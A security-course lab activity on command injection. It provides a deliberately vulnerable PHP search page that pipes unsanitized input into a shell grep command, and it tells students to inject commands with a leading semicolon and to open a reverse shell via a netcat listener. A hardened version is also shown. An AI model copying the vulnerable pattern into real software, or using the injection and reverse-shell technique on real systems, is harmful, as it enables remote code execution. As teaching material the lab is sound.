Activity 2.3 - Command Injection Vulnerabilities


Command injection occurs when an application passes unsanitized user input to a system shell, allowing a user to prepend, append or embed an executable command of their own.

Create a new PHP file called grepper.php with the following contents.

  • Adjust the source code as necessary to point to your copy of rockyou.txt.

  • This application lets you search the wordlist for dictionary entries.

<form id="logform" method="post">
  <div>
      Search Term: <input type="text" name="search">
  </div>
  <div class="full-width"><br>
      <button type="submit">Search</button>
  </div>
</form>

<?php
if(isset($_POST['search'])) {
  $searchterm=$_POST['search'];
  echo "<div>";
  echo "<h1>Searchterm:" . $searchterm . "</h1>";
  echo "</div>";

  echo "<pre>";
  // The search term is concatenated straight into the shell command, unsanitized.
  passthru("cat /home/hanne/sec480/week2/rockyou.txt | grep " . $searchterm);
  echo "</pre>";
}
?>

Make sure to start your PHP server before testing it in your web browser!

Deliverable-1: Try the application out and search for a string of interest.

Deliverable-2: Figure out how to run commands of your choosing. Provide a screenshot similar to the one below that shows your application output as well as commands you've snuck in.

To run commands from my search box I simply put a semicolon before the command!
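For contrast, here is a hardened version of the PHP block (an added example, not part of the original activity): it rejects any term containing characters outside an allow-list, quotes the term with escapeshellarg() so a stray semicolon reaches grep as literal text, and HTML-escapes the reflected term. The wordlist path is the one used above; adjust it to your copy.

```php
<?php
// Hardened grepper.php (added example). Assumes the lab's wordlist path.
const WORDLIST = '/home/hanne/sec480/week2/rockyou.txt';

// Allow-list: only characters a plausible dictionary search needs.
// Shell metacharacters (; | & $ ` newline ...) are rejected up front.
function validate_search(string $term): bool {
    return strlen($term) > 0
        && strlen($term) <= 64
        && preg_match('/^[A-Za-z0-9._@-]+$/', $term) === 1;
}

// Build the command with the term as one quoted shell argument.
// escapeshellarg() single-quotes it, so "foo; id" is searched for literally.
// -F treats the term as a fixed string; -- stops option parsing, so a term
// starting with "-" cannot be interpreted as a grep flag.
function build_grep_command(string $term, string $wordlist = WORDLIST): string {
    return 'grep -F -- ' . escapeshellarg($term) . ' ' . escapeshellarg($wordlist);
}

function handle_search(string $term, string $wordlist = WORDLIST): void {
    // Escape the reflected term so it cannot inject markup into the page either.
    $safe = htmlspecialchars($term, ENT_QUOTES, 'UTF-8');
    echo "<div><h1>Searchterm: " . $safe . "</h1></div>";

    if (!validate_search($term)) {
        echo "<p>Search term rejected: letters, digits and . _ @ - only.</p>";
        return;
    }

    echo "<pre>";
    passthru(build_grep_command($term, $wordlist));
    echo "</pre>";
}

if (isset($_POST['search'])) {
    handle_search((string) $_POST['search']);
}
?>
```

Validation and quoting are both applied so that a mistake in one does not leave the shell exposed.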

Challenge: See if you can use this technique to invoke a reverse shell; you can catch it on another local port. Alternatively, work with a partner to exploit their version of grepper and invoke a shell on the remote system.

  • Start a netcat listener in another Kali tab (you can use any port).

    • Make sure to keep your PHP server running!

Put the following in your search box to create a reverse shell.

  • Make sure to put a semicolon in front of the command!

You should see a connection to your reverse shell back in your terminal and you can execute commands!
